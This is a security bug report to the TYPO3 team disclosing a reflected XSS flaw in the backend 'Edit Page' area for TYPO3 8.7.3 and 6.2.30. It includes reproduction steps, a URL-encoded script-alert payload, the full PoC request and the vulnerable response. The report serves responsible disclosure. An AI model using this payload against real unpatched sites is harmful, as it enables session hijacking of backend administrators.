Bug #82077
closedXSS in page module
100%
Description
For the attention of the TYPO3 security team,
I would like to inform you about a security issue that I have found on the cms TYPO3 (checked on versions 8.7.3 and 6.2.30).
Specifically that versions of TYPO3 are vulnerable to a Reflected Cross-Site Scripting in the "Edit Page" area of the Backend administrative console, for the pages which are configured to show the content from other pages.
Technical Details
=================
Below is descripted the scenario to reproduce the security issue.
Prerequisite - Configure a page to show content from another page: in the home Backend administrative console select "Page" from the left panel, then select a site page in the tree view on the side and go to the "Edit Page". After select the "Appaerance" tab and click the "Page" button in the "Replace Content" section in order to add any content to that page and finally save it.
At this point in the "Edit Page" area for the aforementioned page will appear a blue rectangle with inside a link with the label "Page uses content from ...", and this link is affected by the reflected XSS issue.
Proof of Concept:
To replicate the issue is sufficient to click the aforementioned new link (for the 8.7.3 it have the format: "/typo3/index.php?M=web_layout&moduleToken=<TOKEN-VALUE>&id=<ID-VALUE>").
And so grab the GET request which is being passed to the server and add the payload in the URL query, so the submitted payload is reflected on the correspondent response body.
EXAMPLE (attached there is a screenshot of the PoC)
Payload: &xss%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E
ORIGINAL REQUEST:
--------------------------------
GET /typo3/index.php?M=web_layout&moduleToken=4b50d8bcec3020fc1f161a4e7c5f4617575c4528&id=2 HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: be_lastLoginProvider=1433416747; be_typo_user=4e3170451d0ce390cece8bca5e06855f
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Wed, 12 Jul 2017 07:20:31 GMT
PoC REQUEST:
------------
GET /typo3/index.php?M=web_layout&moduleToken=4b50d8bcec3020fc1f161a4e7c5f4617575c4528&id=2&xss%22%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: be_lastLoginProvider=1433416747; be_typo_user=4e3170451d0ce390cece8bca5e06855f
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
PoC RESPONSE:
-------------
HTTP/1.1 200 OK
Date: Wed, 12 Jul 2017 08:15:06 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: 0
Last-Modified: Wed, 12 Jul 2017 08:15:06 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41399
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
[...]
<div class="callout callout-info"><div class="media"><div class="media-left"><span class="fa-stack fa-lg callout-icon"><i class="fa fa-circle fa-stack-2x"></i><i class="fa fa-info fa-stack-1x"></i></span></div><div class="media-body"><h4 class="callout-title">page1</h4><div class="callout-body">
Page uses content from this page: <a href="/typo3/index.php?M=web_layout&moduleToken=4b50d8bcec3020fc1f161a4e7c5f4617575c4528&id=1&xss"><script>alert('xss')</script>=">page1 (PID 1)</a>
</div></div></div></div>
[...]
Vulnerable Versions:
TYPO3 8.7.3 and earlier
Checked on:
TYPO3/8.7.3
TYPO3/6.2.30 (for the 6.2.x versions the affected link is "/typo3/sysext/cms/layout/db_layout.php?id=1&clear_cache=1")